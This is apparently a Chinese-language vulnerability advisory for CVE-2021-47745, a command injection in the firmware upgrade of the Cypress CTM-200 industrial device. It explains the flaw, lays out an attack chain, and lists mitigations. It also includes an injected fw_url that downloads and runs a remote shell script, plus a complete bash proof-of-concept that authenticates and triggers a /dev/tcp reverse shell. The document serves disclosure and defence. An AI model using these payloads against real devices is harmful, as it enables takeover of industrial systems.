CVE-2021-47745 | Cypress CTM-200 固件升级命令注入漏洞

漏洞信息

漏洞编号

CVE-2021-47745

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cypress Solutions CTM-200 2.7.1

漏洞概述

CVE-2021-47745是Cypress Solutions公司生产的CTM-200设备中存在的一个高危命令注入漏洞。该漏洞存在于设备的固件升级功能中，具体位于ctm-config-upgrade.sh脚本。攻击者通过利用固件升级功能中的fw_url参数，可以在已认证的情况下注入任意Shell命令，并以root权限在目标系统上执行。

CTM-200是一款广泛应用于工业控制系统的设备，其固件升级功能本意是为了方便管理员更新设备固件。然而，由于该功能对用户输入的fw_url参数缺乏充分的输入验证和过滤，攻击者可以通过构造恶意构造的URL参数，在参数值中嵌入Shell命令。当设备执行固件升级脚本时，这些恶意命令将与合法命令一起被传递给系统的命令解释器（通常是bash或sh），从而实现任意代码执行。

由于该漏洞需要认证才能利用，因此主要威胁来自于内部人员或已获取有效凭证的攻击者。一旦成功利用，攻击者可以完全控制目标设备，访问敏感数据，修改设备配置，甚至将恶意代码持久化到设备中。此外，攻击者还可以利用被入侵的设备作为跳板，进一步渗透内网中的其他系统。

该漏洞的CVSS评分达到8.8分，属于高危漏洞。攻击向量为网络形式，无需用户交互，攻击复杂度较低，但需要低权限认证。漏洞对机密性、完整性和可用性都造成严重影响，CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H。建议受影响的用户尽快升级到安全版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于ctm-config-upgrade.sh脚本对fw_url参数的处理方式存在安全缺陷。脚本在接收用户提供的固件下载URL后，直接将该参数的值传递给系统命令执行函数，而没有进行充分的输入验证和命令隔离。

具体来说，当管理员通过Web界面或其他方式触发固件升级功能时，设备会调用ctm-config-upgrade.sh脚本。该脚本通常会执行类似以下操作：使用curl或wget等工具根据fw_url参数指定的地址下载固件文件，然后进行验证和升级。然而，由于缺少参数转义或安全的参数传递机制，攻击者可以在fw_url参数中插入Shell元字符和命令。

例如，攻击者可以构造如下的fw_url值：
http://attacker.com/firmware.bin; wget http://attacker.com/shell.sh && chmod +x shell.sh && ./shell.sh

当脚本执行wget命令时，由于fw_url参数未经安全处理，分号后的命令将被作为独立命令执行。类似地，攻击者还可以使用管道符(|)、反引号($())等Shell语法来注入任意命令。

由于固件升级脚本通常以root权限运行，注入的命令也将以root权限执行，从而实现完全的系统控制。攻击者可以利用这一点安装后门、修改系统配置、窃取敏感数据或建立持久化控制通道。

该漏洞的利用条件包括：攻击者需要拥有目标设备的有效认证凭证，且能够访问设备的固件升级功能界面。在成功利用后，攻击者可以获得设备的完全控制权，且这种控制具有持久性，即使设备重启后仍可能保持。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标设备为Cypress Solutions CTM-200，并确定固件版本为2.7.1（存在漏洞的版本）

STEP 2

步骤2

获取认证凭证：攻击者通过暴力破解、社会工程或其他方式获取目标设备的有效登录凭证

STEP 3

步骤3

构造恶意Payload：攻击者构造包含Shell命令注入代码的fw_url参数值，如嵌入反弹Shell命令或下载执行后门脚本

STEP 4

步骤4

发送漏洞利用请求：攻击者使用认证后的会话，向设备的固件升级接口发送包含恶意fw_url参数的POST请求

STEP 5

步骤5

命令执行：设备执行ctm-config-upgrade.sh脚本时，未经过滤的fw_url参数值被传递给系统命令解释器，注入的恶意命令得以执行

STEP 6

步骤6

建立持久化控制：成功执行命令后，攻击者通常会安装后门、修改启动脚本或创建新用户账户，以保持对设备的持续控制

STEP 7

步骤7

横向移动：攻击者利用被入侵的设备作为跳板，通过内网继续渗透其他关键系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2021-47745 PoC - Cypress CTM-200 Command Injection
# Authenticated Command Injection via fw_url parameter in firmware upgrade

TARGET_HOST="192.168.1.100"
USERNAME="admin"
PASSWORD="admin"
ATTACKER_IP="192.168.1.200"

# Generate reverse shell payload
PAYLOAD=";bash -i >& /dev/tcp/${ATTACKER_IP}/4444 0>&1;"

# URL encode the payload
ENCODED_PAYLOAD=$(echo -n "${PAYLOAD}" | python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.stdin.read()))")

# Construct the malicious firmware URL
MALICIOUS_URL="http://${ATTACKER_IP}/firmware.bin${ENCODED_PAYLOAD}"

echo "[+] CVE-2021-47745 PoC"
echo "[+] Target: ${TARGET_HOST}"
echo "[+] Malicious URL: ${MALICIOUS_URL}"

# Authenticate and obtain session cookie
SESSION_COOKIE=$(curl -s -c - -d "username=${USERNAME}&password=${PASSWORD}" \
    "http://${TARGET_HOST}/login" | grep session | awk '{print $NF}')

if [ -z "${SESSION_COOKIE}" ]; then
    echo "[-] Authentication failed"
    exit 1
fi

echo "[+] Authentication successful"

# Trigger firmware upgrade with malicious fw_url parameter
curl -v -b "session=${SESSION_COOKIE}" \
    -X POST \
    -d "fw_url=${MALICIOUS_URL}" \
    "http://${TARGET_HOST}/api/firmware/upgrade"

echo "[+] Exploit sent, check your listener on port 4444"

影响范围

Cypress Solutions CTM-200 2.7.1 (存在漏洞)

Cypress Solutions CTM-200 < 2.7.1 (可能受影响)

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 严格限制对设备管理界面的访问，仅允许受信任的管理员IP访问；2) 更改所有默认凭证，使用强密码策略；3) 禁用不必要的固件升级功能或限制其使用；4) 启用详细的审计日志，监控固件升级功能的异常使用情况；5) 在网络层面部署防火墙和入侵检测系统，对异常的固件升级请求进行告警和阻断；6) 考虑将受影响设备隔离在独立的网络区域，减少潜在攻击的影响范围。